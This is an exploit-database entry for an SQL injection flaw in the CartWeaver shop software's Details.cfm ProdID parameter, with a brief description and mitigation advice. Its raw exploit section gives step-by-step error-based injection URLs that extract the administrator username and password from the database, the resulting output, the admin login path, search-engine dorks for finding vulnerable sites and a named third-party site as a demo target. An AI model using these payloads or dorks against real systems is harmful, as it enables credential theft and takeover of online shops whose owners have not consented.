header-logo
Suggest Exploit
vendor:
CartWeaver
by:
meoconx[at]vnbrain.net
7.5
CVSS
HIGH
SQL Injection
89
CWE
Product Name: CartWeaver
Affected Version From: Unknown
Affected Version To: Unknown
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested: Unknown
2007

CartWeaver SQL Injection Vulnerability

The CartWeaver application is vulnerable to SQL injection attacks in the Details.cfm page, specifically in the ProdID parameter. An attacker can manipulate the ProdID parameter to execute arbitrary SQL queries. This can lead to unauthorized access, disclosure of sensitive information, and potential compromise of the application and its data.

Mitigation:

To mitigate this vulnerability, it is recommended to implement proper input validation and parameterized queries to prevent SQL injection attacks. Additionally, the vendor should release a patch or update to address this vulnerability.
Source

Exploit-DB raw data:

author:meoconx[at]vnbrain.net
product:CartWeaver
main site:www.cartweaver.com
1.with CFM CartWeaver:
sql injection in:
Details.cfm?ProdID=a'

demo:
http://www.jbracing.co.uk/Details.cfm?ProdID=1'
****************
exploit:
http://www.xxx.com/Details.cfm?ProdID=[sql query]
****************
link admin:
http://www.xxx.com/[script path]/cw2/admin/
****************
dork:
allinurl:Details.cfm ?ProdID=
allinurl:Results.cfm?category=
***************
********************
An example:
http://www.xxxxx.co.uk/Details.cfm?ProdID=1'
********************
exploit it:
-get username:
http://www.xxxxx.co.uk/Details.cfm?ProdID=1%20and%201=convert(int,(select%20top%201%20admin_username%20from%20tbl_adminusers))
Conversion failed when converting the nvarchar value 'jim' to data type int.
==> the username is "jim"
-get password:
http://www.xxxxx.co.uk/Details.cfm?ProdID=1%20and%201=convert(int,(select%20top%201%20char(97)%2badmin_password%20from%20tbl_adminusers))
Conversion failed when converting the nvarchar value 'a518888' to data type int. The error occurred. on line 116.
==> the password is "51888"( because we added the "a" in the query to get the number that can be converted to integer value)
-now, login into admin:
http://www.xxxxx.co.uk/cw2/admin/

# milw0rm.com [2007-08-06]